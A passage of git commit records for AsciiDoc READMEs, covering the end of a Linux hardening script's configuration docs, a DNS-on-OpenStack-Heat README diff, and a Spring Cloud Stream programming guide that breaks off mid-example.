`grub-mkpasswd-pbkdf2`). +\nDownload the script using `git clone https:\/\/github.com\/konstruktoid\/hardening.git`. + \nChange the configuration options in the `ubuntu.cfg` file and last but not least run the script, `sudo bash ubuntu.sh`. 
+\n\n== Configuration options\n[source,shell]\n----\nFW_ADMIN='127.0.0.1' \/\/ <1>\nSSH_GRPS='sudo' \/\/ <2>\nSYSCTL_CONF='https:\/\/raw.githubusercontent.com\/konstruktoid\/hardening\/master\/misc\/sysctl.conf' \/\/ <3>\nAUDITD_RULES='https:\/\/raw.githubusercontent.com\/konstruktoid\/hardening\/master\/misc\/audit.rules' \/\/ <4>\nLOGROTATE_CONF='https:\/\/raw.githubusercontent.com\/konstruktoid\/hardening\/master\/misc\/logrotate.conf' \/\/ <5>\nNTPSERVERPOOL='0.ubuntu.pool.ntp.org 1.ubuntu.pool.ntp.org 2.ubuntu.pool.ntp.org 3.ubuntu.pool.ntp.org pool.ntp.org' \/\/ <6>\nVERBOSE='N' \/\/ <7>\nCHANGEME='' \/\/ <8>\n\n# Configuration files\nADDUSER='\/etc\/adduser.conf'\nAUDITDCONF='\/etc\/audit\/auditd.conf'\nAUDITRULES='\/etc\/audit\/rules.d\/hardening.rules'\nCOMMONPASSWD='\/etc\/pam.d\/common-password'\nCOMMONACCOUNT='\/etc\/pam.d\/common-account'\nCOMMONAUTH='\/etc\/pam.d\/common-auth'\nDEFAULTGRUB='\/etc\/default\/grub'\nDISABLEMNT='\/etc\/modprobe.d\/disablemnt.conf'\nDISABLEMOD='\/etc\/modprobe.d\/disablemod.conf'\nDISABLENET='\/etc\/modprobe.d\/disablenet.conf'\nJOURNALDCONF='\/etc\/systemd\/journald.conf'\nLIMITSCONF='\/etc\/security\/limits.conf'\nLOGINDCONF='\/etc\/systemd\/logind.conf'\nLOGINDEFS='\/etc\/login.defs'\nLOGROTATE='\/etc\/logrotate.conf'\nPAMLOGIN='\/etc\/pam.d\/login'\nRESOLVEDCONF='\/etc\/systemd\/resolved.conf'\nRKHUNTERCONF='\/etc\/default\/rkhunter'\nSECURITYACCESS='\/etc\/security\/access.conf'\nSSHDFILE='\/etc\/ssh\/sshd_config'\nSYSCTL='\/etc\/sysctl.conf'\nSYSTEMCONF='\/etc\/systemd\/system.conf'\nTIMESYNCD='\/etc\/systemd\/timesyncd.conf'\nUFWDEFAULT='\/etc\/default\/ufw'\nUSERADD='\/etc\/default\/useradd'\nUSERCONF='\/etc\/systemd\/user.conf'\n----\n<1> The IP addresses that will be able to connect with SSH.\n<2> Which group the users have to be member of in order to acess via SSH.\n<3> Stricter sysctl settings.\n<4> Auditd rules.\n<5> Logrotate settings.\n<6> NTP server pool.\n<7> If you want all the details or not.\n<8> Add something just to verify that you actually glanced the code.\n\n=== Function list\n`pre` Script setup +\n`firewall` Enable ufw and allow port 22 from `$FW_ADMIN` +\n`disablenet` Disable misc network protocols +\n`disablemnt` Disable misc file systems +\n`disablemod` Disable misc kernel modules +\n`resolvedconf` Systemd\/resolved.conf +\n`systemdconf` Systemd\/system.conf and Systemd\/user.conf +\n`journalctl` Systemd\/journald.conf and logrotate.conf +\n`timesyncd` Systemd\/timesyncd.conf +\n`coredump` Systemd\/coredump.conf +\n`fstab` \/etc\/fstab, system\/tmp.mount and system\/var-tmp.mount +\n`prelink` Prelink +\n`aptget` Updating the package index and upgrading installed packages +\n`hosts` \/etc\/hosts.allow and \/etc\/hosts.deny +\n`issue` Add message to \/etc\/issue, \/etc\/issue.net, \/etc\/motd +\n`logindefs` \/etc\/login.defs +\n`logindconf` Systemd\/logind.conf +\n`sysctl` \/etc\/sysctl.conf +\n`limitsconf` \/etc\/security\/limits.conf +\n`adduser` \/etc\/adduser.conf and \/etc\/default\/useradd +\n`rootaccess` \/etc\/security\/access.conf and \/etc\/securetty +\n`packages` Installing base packages +\n`apport` Disable apport +\n`rkhunter` Configures rkhunter +\n`sshdconfig` \/etc\/ssh\/sshd_config +\n`password` \/etc\/pam.d\/common-password and \/etc\/pam.d\/common-auth +\n`cron` \/etc\/cron and \/etc\/at +\n`ctrlaltdel` Ctrl-alt-delete +\n`auditd` Auditd +\n`aide` Aide +\n`rhosts` .rhosts +\n`users` Remove users +\n`lockroot` Lock root user account +\n`aptget_clean` Remove unused packages +\n`suid` Remove suid bits 
+\n`umask` Set umask +\n`path` Modify paths +\n`aa_enforce` Enforce apparmor profiles +\n`aide_post` Create Aide db +\n`aide_timer` Enable daily Aide check +\n`systemddelta` systemd-delta +\n`checkreboot` Check if reboot is required\n\n== Tests\nThere are approximately 275 https:\/\/github.com\/sstephenson\/bats[Bats tests] for most of the above settings available in the link:tests\/[tests directory].\n\n[source,shell]\n----\ngit clone https:\/\/github.com\/konstruktoid\/hardening.git\ncd tests\/\nsudo bats .\n----\n\n== Recommended reading\nhttps:\/\/benchmarks.cisecurity.org\/downloads\/show-single\/index.cfm?file=independentlinux.100[CIS Distribution Independent Linux Benchmark v1.0.0] +\nhttp:\/\/iase.disa.mil\/stigs\/os\/unix-linux\/Pages\/index.aspx[Draft Red Hat 7 STIG Version 1, Release 0.1] +\nhttps:\/\/benchmarks.cisecurity.org\/downloads\/show-single\/?file=ubuntu1404.100[CIS Ubuntu 14.04 LTS Server Benchmark v1.0.0] +\nhttps:\/\/wiki.ubuntu.com\/Security\/Features +\nhttps:\/\/help.ubuntu.com\/community\/StricterDefaults +\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"01cd3e54de622aba1d96d580b9423d5cc246b366","subject":"added documentation, usage and required var checking to script","message":"added documentation, usage and required var checking to script\n","repos":"markllama\/dns-service-heat,markllama\/dns-service-heat","old_file":"README.adoc","new_file":"README.adoc","new_contents":":gitroot: https:\/\/github.com\/markllama\n\n== DNS Service for OpenStack with Heat\n\nThis repository defines a simple distributed DNS service within an\nOpenStack Heat stack. The goal is to de-mystify DNS services and\ndeployments for low level delegated sub-domains. It is NOT to provide\nenterprise scale and quality DNS services.\n\n== Deployment Procedure\n\nThe stack is deployed using a set of Heat templates and an Ansible\nplaybook driven by a BASH script. In the future these will be\ncollapsed so the entire process is driven by Ansible. For now a small\namount of glue code is still required.\n\n=== Get the GIT repository\n\n.Clone the Heat and Ansible repositories\n\n[subs=attributes]\n----\ngit clone {gitroot}\/dns-service-heat.git\ngit clone {gitroot}\/dns-service-playbooks.git\n----\n\n=== Input Values\n\nZONE::\n The DNS zone to be served +\n Type: string +\n Example: `example.com`\n\nDNS_UPDATE_KEY::\n A symmetric key value for dynamic DNS updates +\n Type: string +\n This is a BASE64 encoded MD5 hash, randomly generated by\n `rndc-confgen(8)`.\n\nSERVER_SPEC_FILE::\n The name of a YAML file containing the Nova instance specification values. +\n Example: +\n----\nparameters:\n flavor: m1.small\n image: rhel73\n ssh_user: cloud-user\n----\n\nEXTERNAL_NETWORK_NAME::\n The name of an existing Neutron network in the OSP environment which\n allows inbound and outbound traffic. +\n Type: string +\n Example: public_network\n \n\n","old_contents":":gitroot: https:\/\/github.com\/markllama\n\n== DNS Service for OpenStack with Heat\n\nThis repository defines a simple distributed DNS service within an\nOpenStack Heat stack. The goal is to de-mystify DNS services and\ndeployments for low level delegated sub-domains. It is NOT to provide\nenterprise scale and quality DNS services.\n\n== Deployment Procedure\n\nThe stack is deployed using a set of Heat templates and an Ansible\nplaybook driven by a BASH script. In the future these will be\ncollapsed so the entire process is driven by Ansible. 
For now a small\namount of glue code is still required.\n\n=== Get the GIT repository\n\n.Clone the Heat and Ansible repositories\n\n[subs=attributes]\n----\ngit clone {gitroot}\/dns-service-heat.git\ngit clone {gitroot}\/dns-service-playbooks.git\n----\n\n=== Input Values\n\nZONE:\n The DNS zone to be served +\n Type: string\n Example: `example.com`\n\nDNS_UPDATE_KEY::\n A symmetric key value for dynamic DNS updates +\n Type: string +\n This is a BASE64 encoded MD5 hash, randomly generated by\n `rndc-confgen(8)`.\n\nSERVER_SPEC_FILE::\n The name of a YAML file containing the Nova instance specification values. +\n Example: +\n\n----\nparameters:\n flavor: m1.small\n image: rhel73\n ssh_user: cloud-user\n----\n\n\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"51a880b9eeb7e5e32866666ac2a17b993f806901","subject":"pushing generated README","message":"pushing generated README\n","repos":"spring-cloud\/spring-cloud-stream,garyrussell\/spring-cloud-stream,spring-cloud\/spring-cloud-stream,ilayaperumalg\/spring-cloud-stream,garyrussell\/spring-cloud-stream,spring-cloud\/spring-cloud-stream,ilayaperumalg\/spring-cloud-stream,garyrussell\/spring-cloud-stream","old_file":"README.adoc","new_file":"README.adoc","new_contents":"\/\/ Do not edit this file (e.g. go instead to src\/main\/asciidoc)\n\n:github-tag: master\n:github-repo: spring-cloud\/spring-cloud-stream\n:github-raw: https:\/\/raw.githubusercontent.com\/{github-repo}\/{github-tag}\n:github-code: https:\/\/github.com\/{github-repo}\/tree\/{github-tag}\n:toc: left\n:toclevels: 8\n:nofooter:\n:sectlinks: true\n\n[partintro]\n--\nThis section goes into more detail about how you can work with Spring Cloud Stream.\nIt covers topics such as creating and running stream applications.\n--\n\n[[spring-cloud-stream-overview-introducing]]\n== Introducing Spring Cloud Stream\n\nSpring Cloud Stream is a framework for building message-driven microservice applications.\nSpring Cloud Stream builds upon Spring Boot to create standalone, production-grade Spring applications and uses Spring Integration to provide connectivity to message brokers.\nIt provides opinionated configuration of middleware from several vendors, introducing the concepts of persistent publish-subscribe semantics, consumer groups, and partitions.\n\nYou can add the `@EnableBinding` annotation to your application to get immediate connectivity to a message broker, and you can add `@StreamListener` to a method to cause it to receive events for stream processing.\nThe following example shows a sink application that receives external messages:\n\n[source,java]\n----\n@SpringBootApplication\n@EnableBinding(Sink.class)\npublic class VoteRecordingSinkApplication {\n\n public static void main(String[] args) {\n SpringApplication.run(VoteRecordingSinkApplication.class, args);\n }\n\n @StreamListener(Sink.INPUT)\n public void processVote(Vote vote) {\n votingService.recordVote(vote);\n }\n}\n----\n\nThe `@EnableBinding` annotation takes one or more interfaces as parameters (in this case, the parameter is a single `Sink` interface).\nAn interface declares input and output channels.\nSpring Cloud Stream provides the `Source`, `Sink`, and `Processor` interfaces. 
You can also define your own interfaces.\n\nThe following listing shows the definition of the `Sink` interface:\n\n[source,java]\n----\npublic interface Sink {\n String INPUT = \"input\";\n\n @Input(Sink.INPUT)\n SubscribableChannel input();\n}\n----\n\nThe `@Input` annotation identifies an input channel, through which received messages enter the application.\nThe `@Output` annotation identifies an output channel, through which published messages leave the application.\nThe `@Input` and `@Output` annotations can take a channel name as a parameter.\nIf a name is not provided, the name of the annotated method is used.\n\nSpring Cloud Stream creates an implementation of the interface for you.\nYou can use this in the application by autowiring it, as shown in the following example (from a test case):\n\n[source,java]\n----\n@RunWith(SpringJUnit4ClassRunner.class)\n@SpringApplicationConfiguration(classes = VoteRecordingSinkApplication.class)\n@WebAppConfiguration\n@DirtiesContext\npublic class StreamApplicationTests {\n\n @Autowired\n private Sink sink;\n\n @Test\n public void contextLoads() {\n assertNotNull(this.sink.input());\n }\n}\n----\n\n== Main Concepts\n\nSpring Cloud Stream provides a number of abstractions and primitives that simplify the writing of message-driven microservice applications.\nThis section gives an overview of the following:\n\n* <<spring-cloud-stream-overview-application-model,Spring Cloud Stream's application model>>\n* <<spring-cloud-stream-overview-binder-abstraction>>\n* <<spring-cloud-stream-overview-persistent-publish-subscribe-support,Persistent publish-subscribe support>>\n* <<consumer-groups,Consumer group support>>\n* <<partitioning,Partitioning support>>\n* <<spring-cloud-stream-overview-binder-api,A pluggable Binder SPI>>\n\n[[spring-cloud-stream-overview-application-model]]\n=== Application Model\n\nA Spring Cloud Stream application consists of a middleware-neutral core.\nThe application communicates with the outside world through input and output channels injected into it by Spring Cloud Stream.\nChannels are connected to external brokers through middleware-specific Binder implementations.\n\n.Spring Cloud Stream Application\nimage::{github-raw}\/docs\/src\/main\/asciidoc\/images\/SCSt-with-binder.png[width=800,scaledwidth=\"75%\",align=\"center\"]\n\n==== Fat JAR\n\nSpring Cloud Stream applications can be run in stand-alone mode from your IDE for testing.\nTo run a Spring Cloud Stream application in production, you can create an executable (or \"`fat`\") JAR by using the standard Spring Boot tooling provided for Maven or Gradle. 
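For instance, with the Spring Boot Maven plugin applied to the build, packaging and launching the application from the command line might look like the following sketch (the JAR name here is illustrative; the actual name depends on your project coordinates):\n\n[source,shell]\n----\n$ mvn clean package\n$ java -jar target\/my-stream-app-0.0.1-SNAPSHOT.jar\n----\n\n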
See the https:\/\/docs.spring.io\/spring-boot\/docs\/current\/reference\/html\/howto-build.html#howto-create-an-executable-jar-with-maven[Spring Boot Reference Guide] for more details.\n\n[[spring-cloud-stream-overview-binder-abstraction]]\n=== The Binder Abstraction\n\nSpring Cloud Stream provides Binder implementations for https:\/\/github.com\/spring-cloud\/spring-cloud-stream-binder-kafka[Kafka] and https:\/\/github.com\/spring-cloud\/spring-cloud-stream-binder-rabbit[Rabbit MQ].\nSpring Cloud Stream also includes a https:\/\/github.com\/spring-cloud\/spring-cloud-stream\/blob\/master\/spring-cloud-stream-test-support\/src\/main\/java\/org\/springframework\/cloud\/stream\/test\/binder\/TestSupportBinder.java[TestSupportBinder], which leaves a channel unmodified so that tests can interact with channels directly and reliably assert on what is received.\nYou can also use the extensible API to write your own Binder.\n\nSpring Cloud Stream uses Spring Boot for configuration, and the Binder abstraction makes it possible for a Spring Cloud Stream application to be flexible in how it connects to middleware.\nFor example, deployers can dynamically choose, at runtime, the destinations (such as the Kafka topics or RabbitMQ exchanges) to which channels connect.\nSuch configuration can be provided through external configuration properties and in any form supported by Spring Boot (including application arguments, environment variables, and `application.yml` or `application.properties` files).\nIn the sink example from the <<spring-cloud-stream-overview-introducing>> section, setting the `spring.cloud.stream.bindings.input.destination` application property to `raw-sensor-data` causes it to read from the `raw-sensor-data` Kafka topic or from a queue bound to the `raw-sensor-data` RabbitMQ exchange.\n\nSpring Cloud Stream automatically detects and uses a binder found on the classpath.\nYou can use different types of middleware with the same code.\nTo do so, include a different binder at build time.\nFor more complex use cases, you can also package multiple binders with your application and have it choose the binder (and even whether to use different binders for different channels) at runtime.\n\n[[spring-cloud-stream-overview-persistent-publish-subscribe-support]]\n=== Persistent Publish-Subscribe Support\n\nCommunication between applications follows a publish-subscribe model, where data is broadcast through shared topics.\nThis can be seen in the following figure, which shows a typical deployment for a set of interacting Spring Cloud Stream applications.\n\n.Spring Cloud Stream Publish-Subscribe\nimage::{github-raw}\/docs\/src\/main\/asciidoc\/images\/SCSt-sensors.png[width=800,scaledwidth=\"75%\",align=\"center\"]\n\nData reported by sensors to an HTTP endpoint is sent to a common destination named `raw-sensor-data`.\nFrom the destination, it is independently processed by a microservice application that computes time-windowed averages and by another microservice application that ingests the raw data into HDFS (Hadoop Distributed File System).\nIn order to process the data, both applications declare the topic as their input at runtime.\n\nThe publish-subscribe communication model reduces the complexity of both the producer and the consumer and lets new applications be added to the topology without disruption of the existing flow.\nFor example, downstream from the average-calculating application, you can add an application that calculates the highest temperature values for display and monitoring.\nYou 
can then add another application that interprets the same flow of averages for fault detection.\nDoing all communication through shared topics rather than point-to-point queues reduces coupling between microservices.\n\nWhile the concept of publish-subscribe messaging is not new, Spring Cloud Stream takes the extra step of making it an opinionated choice for its application model.\nBy using native middleware support, Spring Cloud Stream also simplifies use of the publish-subscribe model across different platforms.\n\n[[consumer-groups]]\n=== Consumer Groups\nWhile the publish-subscribe model makes it easy to connect applications through shared topics, the ability to scale up by creating multiple instances of a given application is equally important.\nWhen doing so, different instances of an application are placed in a competing consumer relationship, where only one of the instances is expected to handle a given message.\n\nSpring Cloud Stream models this behavior through the concept of a consumer group.\n(Spring Cloud Stream consumer groups are similar to and inspired by Kafka consumer groups.)\nEach consumer binding can use the `spring.cloud.stream.bindings.<channelName>.group` property to specify a group name.\nFor the consumers shown in the following figure, this property would be set as `spring.cloud.stream.bindings.<channelName>.group=hdfsWrite` or `spring.cloud.stream.bindings.<channelName>.group=average`.\n\n.Spring Cloud Stream Consumer Groups\nimage::{github-raw}\/docs\/src\/main\/asciidoc\/images\/SCSt-groups.png[width=800,scaledwidth=\"75%\",align=\"center\"]\n\nAll groups that subscribe to a given destination receive a copy of published data, but only one member of each group receives a given message from that destination.\nBy default, when a group is not specified, Spring Cloud Stream assigns the application to an anonymous and independent single-member consumer group that is in a publish-subscribe relationship with all other consumer groups.\n\n[[consumer-types]]\n=== Consumer Types\n\nTwo types of consumer are supported:\n\n* Message-driven (sometimes referred to as Asynchronous)\n* Polled (sometimes referred to as Synchronous)\n\nPrior to version 2.0, only asynchronous consumers were supported. A message is delivered as soon as it is available and a thread is available to process it.\n\nWhen you wish to control the rate at which messages are processed, you might want to use a synchronous consumer.\nWith a polled consumer, the application itself decides when to retrieve and process the next message, which gives it direct control over the rate of consumption.\n
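The following is a minimal sketch of the polled style (the `PollableMessageSource` binding itself is described under \"`Pollable Destination Binding`\" later in this guide; the `ApplicationRunner` wiring, handler body, and back-off delay are illustrative assumptions rather than required API usage):\n\n[source, java]\n----\n@Bean\npublic ApplicationRunner poller(PollableMessageSource orders) {\n\treturn args -> {\n\t\twhile (true) {\n\t\t\t\/\/ poll() hands at most one message to the handler and reports\n\t\t\t\/\/ whether a message was actually received and processed\n\t\t\tboolean processed = orders.poll(m -> System.out.println(\"Received: \" + m.getPayload()));\n\t\t\tif (!processed) {\n\t\t\t\tThread.sleep(1000); \/\/ nothing available yet, so back off before the next poll\n\t\t\t}\n\t\t}\n\t};\n}\n----\n\nIn a real application, such a loop would typically run on its own thread or scheduler; the key point is that the application initiates every `poll` call.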
\n\n[[durability]]\n==== Durability\n\nConsistent with the opinionated application model of Spring Cloud Stream, consumer group subscriptions are durable.\nThat is, a binder implementation ensures that group subscriptions are persistent and that, once at least one subscription for a group has been created, the group receives messages, even if they are sent while all applications in the group are stopped.\n\n[NOTE]\n====\nAnonymous subscriptions are non-durable by nature.\nFor some binder implementations (such as RabbitMQ), it is possible to have non-durable group subscriptions.\n====\n\nIn general, it is preferable to always specify a consumer group when binding an application to a given destination.\nWhen scaling up a Spring Cloud Stream application, you must specify a consumer group for each of its input bindings.\nDoing so prevents the application's instances from receiving duplicate messages (unless that behavior is desired, which is unusual).\n\n[[partitioning]]\n=== Partitioning Support\n\nSpring Cloud Stream provides support for partitioning data between multiple instances of a given application.\nIn a partitioned scenario, the physical communication medium (such as the broker topic) is viewed as being structured into multiple partitions.\nOne or more producer application instances send data to multiple consumer application instances and ensure that data identified by common characteristics are processed by the same consumer instance.\n\nSpring Cloud Stream provides a common abstraction for implementing partitioned processing use cases in a uniform fashion.\nPartitioning can thus be used whether the broker itself is naturally partitioned (for example, Kafka) or not (for example, RabbitMQ).\n\n.Spring Cloud Stream Partitioning\nimage::{github-raw}\/docs\/src\/main\/asciidoc\/images\/SCSt-partitioning.png[width=800,scaledwidth=\"75%\",align=\"center\"]\n\nPartitioning is a critical concept in stateful processing, where it is essential (for either performance or consistency reasons) to ensure that all related data is processed together.\nFor example, in the time-windowed average calculation example, it is important that all measurements from any given sensor are processed by the same application instance.\n\nNOTE: To set up a partitioned processing scenario, you must configure both the data-producing and the data-consuming ends.\n\n== Programming Model\n\nTo understand the programming model, you should be familiar with the following core concepts:\n\n* *Destination Binders:* Components responsible for providing integration with the external messaging systems.\n* *Destination Bindings:* Bridge between the external messaging systems and application-provided _Producers_ and _Consumers_ of messages (created by the Destination Binders).\n* *Message:* The canonical data structure used by producers and consumers to communicate with Destination Binders (and thus other applications via external messaging systems).\n\nimage::{github-raw}\/docs\/src\/main\/asciidoc\/images\/SCSt-overview.png[width=800,scaledwidth=\"75%\",align=\"center\"]\n\n=== Destination Binders\n\nDestination Binders are extension components of Spring Cloud Stream responsible for providing the necessary configuration and implementation to facilitate\nintegration with external messaging systems.\nThis integration is responsible for connectivity, delegation, and routing of messages to and from producers and consumers, data type conversion,\ninvocation of 
== Programming Model\n\nTo understand the programming model, you should be familiar with the following core concepts:\n\n* *Destination Binders:* Components responsible for providing integration with the external messaging systems.\n* *Destination Bindings:* Bridge between the external messaging systems and application-provided _Producers_ and _Consumers_ of messages (created by the Destination Binders).\n* *Message:* The canonical data structure used by producers and consumers to communicate with Destination Binders (and thus other applications via external messaging systems).\n\nimage::{github-raw}\/docs\/src\/main\/asciidoc\/images\/SCSt-overview.png[width=800,scaledwidth=\"75%\",align=\"center\"]\n\n=== Destination Binders\n\nDestination Binders are extension components of Spring Cloud Stream responsible for providing the necessary configuration and implementation to facilitate\nintegration with external messaging systems.\nThis integration is responsible for connectivity, delegation, and routing of messages to and from producers and consumers, data type conversion,\ninvocation of the user code, and more.\n\nBinders handle a lot of the boilerplate responsibilities that would otherwise fall on your shoulders. However, to accomplish that, the binder still needs\nsome help in the form of a minimal yet required set of instructions from the user, which typically comes in the form of some type of configuration.\n\nWhile it is out of the scope of this section to discuss all of the available binder and binding configuration options (the rest of the manual covers them extensively),\n_Destination Binding_ does require special attention. The next section discusses it in detail.\n\n=== Destination Bindings\n\nAs stated earlier, _Destination Bindings_ provide a bridge between the external messaging system and application-provided _Producers_ and _Consumers_.\n\nApplying the `@EnableBinding` annotation to one of the application's configuration classes defines a destination binding.\nThe `@EnableBinding` annotation itself is meta-annotated with `@Configuration` and triggers the configuration of the Spring Cloud Stream infrastructure.\n\nThe following example shows a fully configured and functioning Spring Cloud Stream application that receives the payload of the message from the `INPUT`\ndestination as a `String` type (see the <<Content Type Negotiation>> section), logs it to the console, and sends it to the `OUTPUT` destination after converting it to upper case.\n\n[source, java]\n----\n@SpringBootApplication\n@EnableBinding(Processor.class)\npublic class MyApplication {\n\n\tpublic static void main(String[] args) {\n\t\tSpringApplication.run(MyApplication.class, args);\n\t}\n\n\t@StreamListener(Processor.INPUT)\n\t@SendTo(Processor.OUTPUT)\n\tpublic String handle(String value) {\n\t\tSystem.out.println(\"Received: \" + value);\n\t\treturn value.toUpperCase();\n\t}\n}\n----\n\nAs you can see, the `@EnableBinding` annotation can take one or more interface classes as parameters. The parameters are referred to as _bindings_,\nand they contain methods representing _bindable components_.\nThese components are typically message channels (see https:\/\/docs.spring.io\/spring-boot\/docs\/current\/reference\/html\/boot-features-messaging.html[Spring Messaging])\nfor channel-based binders (such as Rabbit, Kafka, and others). However, other types of bindings can\nprovide support for the native features of the corresponding technology. For example, the Kafka Streams binder (formerly known as KStream) allows native bindings directly to Kafka Streams\n(see https:\/\/docs.spring.io\/autorepo\/docs\/spring-cloud-stream-binder-kafka-docs\/1.1.0.M1\/reference\/htmlsingle\/[Kafka Streams] for more details).\n\n
Spring Cloud Stream already provides _binding_ interfaces for typical message exchange contracts, which include:\n\n* *Sink:* Identifies the contract for the message consumer by providing the destination from which the message is consumed.\n* *Source:* Identifies the contract for the message producer by providing the destination to which the produced message is sent.\n* *Processor:* Encapsulates both the sink and the source contracts by exposing two destinations that allow consumption and production of messages.\n\n[source, java]\n----\npublic interface Sink {\n\n String INPUT = \"input\";\n\n @Input(Sink.INPUT)\n SubscribableChannel input();\n}\n----\n\n[source, java]\n----\npublic interface Source {\n\n String OUTPUT = \"output\";\n\n @Output(Source.OUTPUT)\n MessageChannel output();\n}\n----\n\n[source, java]\n----\npublic interface Processor extends Source, Sink {}\n----\n\nWhile the preceding example satisfies the majority of cases, you can also define your own contracts by defining your own binding interfaces and using the `@Input` and `@Output`\nannotations to identify the actual _bindable components_.\n\nFor example:\n\n[source, java]\n----\npublic interface Barista {\n\n @Input\n SubscribableChannel orders();\n\n @Output\n MessageChannel hotDrinks();\n\n @Output\n MessageChannel coldDrinks();\n}\n----\n\nUsing the interface shown in the preceding example as a parameter to `@EnableBinding` triggers the creation of the three bound channels named `orders`, `hotDrinks`, and `coldDrinks`,\nrespectively.\n\nYou can provide as many binding interfaces as you need, as arguments to the `@EnableBinding` annotation, as shown in the following example:\n\n[source, java]\n----\n@EnableBinding(value = { Orders.class, Payment.class })\n----\n\nIn Spring Cloud Stream, the bindable `MessageChannel` components are the Spring Messaging `MessageChannel` (for outbound) and its extension, `SubscribableChannel`\n(for inbound).\n\n*Pollable Destination Binding*\n\nWhile the previously described bindings support event-based message consumption, sometimes you need more control, such as the rate of consumption.\n\nStarting with version 2.0, you can bind a pollable consumer, as shown in the following example:\n\n[source, java]\n----\npublic interface PolledBarista {\n\n @Input\n PollableMessageSource orders();\n\t. . .\n}\n----\n\nIn this case, an implementation of `PollableMessageSource` is bound to the `orders` \u201cchannel\u201d. See <<Using Polled Consumers>> for more details.\n\n*Customizing Channel Names*\n\nBy using the `@Input` and `@Output` annotations, you can specify a customized channel name for the channel, as shown in the following example:\n\n[source, java]\n----\npublic interface Barista {\n @Input(\"inboundOrders\")\n SubscribableChannel orders();\n}\n----\n\nIn the preceding example, the created bound channel is named `inboundOrders`.\n\n
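Note that it is the channel name (not the method name) that is then used when configuring the binding. As a minimal sketch (the destination and group values are assumptions for illustration):\n\n[source,text]\n----\n# configure the binding created above by its channel name, 'inboundOrders'\nspring.cloud.stream.bindings.inboundOrders.destination=orders\nspring.cloud.stream.bindings.inboundOrders.group=baristas\n----\n\n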
Normally, you need not access individual channels or bindings directly (other than configuring them via the `@EnableBinding` annotation). However, there may be\ntimes, such as testing or other corner cases, when you do.\n\nAside from generating channels for each binding and registering them as Spring beans, for each bound interface, Spring Cloud Stream generates a bean that implements the interface.\nThat means you can access the interfaces representing the bindings or the individual channels by autowiring them in your application, as shown in the following two examples:\n\n_Autowire Binding interface_\n\n[source, java]\n----\n@Autowired\nprivate Source source;\n\npublic void sayHello(String name) {\n source.output().send(MessageBuilder.withPayload(name).build());\n}\n----\n\n_Autowire individual channel_\n\n[source, java]\n----\n@Autowired\nprivate MessageChannel output;\n\npublic void sayHello(String name) {\n output.send(MessageBuilder.withPayload(name).build());\n}\n----\n\nYou can also use the standard Spring `@Qualifier` annotation for cases when channel names are customized or in multiple-channel scenarios that require specifically named channels.\n\nThe following example shows how to use the `@Qualifier` annotation in this way:\n\n[source, java]\n----\n@Autowired\n@Qualifier(\"myChannel\")\nprivate MessageChannel output;\n----\n\n[[spring-cloud-stream-overview-producing-consuming-messages]]\n=== Producing and Consuming Messages\n\nYou can write a Spring Cloud Stream application by using either Spring Integration annotations or Spring Cloud Stream native annotations.\n\n==== Spring Integration Support\n\nSpring Cloud Stream is built on the concepts and patterns defined by http:\/\/www.enterpriseintegrationpatterns.com\/[Enterprise Integration Patterns] and relies\nin its internal implementation on an already established and popular implementation of Enterprise Integration Patterns within the Spring portfolio of projects:\nthe https:\/\/projects.spring.io\/spring-integration\/[Spring Integration] framework.\n\nSo it is only natural for it to support the foundation, semantics, and configuration options that are already established by Spring Integration.\n\nFor example, you can attach the output channel of a `Source` to a `MessageSource` and use the familiar `@InboundChannelAdapter` annotation, as follows:\n\n[source, java]\n----\n@EnableBinding(Source.class)\npublic class TimerSource {\n\n @Bean\n @InboundChannelAdapter(value = Source.OUTPUT, poller = @Poller(fixedDelay = \"10\", maxMessagesPerPoll = \"1\"))\n public MessageSource<String> timerMessageSource() {\n return () -> new GenericMessage<>(\"Hello Spring Cloud Stream\");\n }\n}\n----\n\nSimilarly, you can use `@Transformer` or `@ServiceActivator` while providing an implementation of a message handler method for a _Processor_ binding contract, as shown in the following example:\n\n[source,java]\n----\n@EnableBinding(Processor.class)\npublic class TransformProcessor {\n @Transformer(inputChannel = Processor.INPUT, outputChannel = Processor.OUTPUT)\n public Object transform(String message) {\n return message.toUpperCase();\n }\n}\n----\n\nNOTE: While this may be skipping ahead a bit, it is important to understand that, when you consume from the same binding using the `@StreamListener` annotation, a pub-sub model is used.\nEach method annotated with `@StreamListener` receives its own copy of a message, and each one has its own consumer group.\nHowever, if you consume from the same binding by using one of the Spring Integration annotations (such as `@Aggregator`, `@Transformer`, or `@ServiceActivator`), those consume in a competing model.\nNo individual consumer group is created for each subscription.\n\n
==== Using @StreamListener Annotation\n\nComplementary to its Spring Integration support, Spring Cloud Stream provides its own `@StreamListener` annotation, modeled after other Spring Messaging annotations\n(`@MessageMapping`, `@JmsListener`, `@RabbitListener`, and others) and offering conveniences, such as content-based routing.\n\n[source,java]\n----\n@EnableBinding(Sink.class)\npublic class VoteHandler {\n\n @Autowired\n VotingService votingService;\n\n @StreamListener(Sink.INPUT)\n public void handle(Vote vote) {\n votingService.record(vote);\n }\n}\n----\n\nAs with other Spring Messaging methods, method arguments can be annotated with `@Payload`, `@Headers`, and `@Header`.\n\nFor methods that return data, you must use the `@SendTo` annotation to specify the output binding destination for data returned by the method, as shown in the following example:\n\n[source,java]\n----\n@EnableBinding(Processor.class)\npublic class TransformProcessor {\n\n @Autowired\n VotingService votingService;\n\n @StreamListener(Processor.INPUT)\n @SendTo(Processor.OUTPUT)\n public VoteResult handle(Vote vote) {\n return votingService.record(vote);\n }\n}\n----\n\n==== Using @StreamListener for Content-based Routing\n\nSpring Cloud Stream supports dispatching messages to multiple handler methods annotated with `@StreamListener` based on conditions.\n\nIn order to be eligible to support conditional dispatching, a method must satisfy the following conditions:\n\n* It must not return a value.\n* It must be an individual message handling method (reactive API methods are not supported).\n\nThe condition is specified by a SpEL expression in the `condition` argument of the annotation and is evaluated for each message.\nAll the handlers that match the condition are invoked in the same thread, and no assumption must be made about the order in which the invocations take place.\n\nIn the following example of a `@StreamListener` with dispatching conditions, all the messages bearing a header `type` with the value `bogey` are dispatched to the\n`receiveBogey` method, and all the messages bearing a header `type` with the value `bacall` are dispatched to the `receiveBacall` method.\n\n[source,java]\n----\n@EnableBinding(Sink.class)\n@EnableAutoConfiguration\npublic static class TestPojoWithAnnotatedArguments {\n\n @StreamListener(target = Sink.INPUT, condition = \"headers['type']=='bogey'\")\n public void receiveBogey(@Payload BogeyPojo bogeyPojo) {\n \/\/ handle the message\n }\n\n @StreamListener(target = 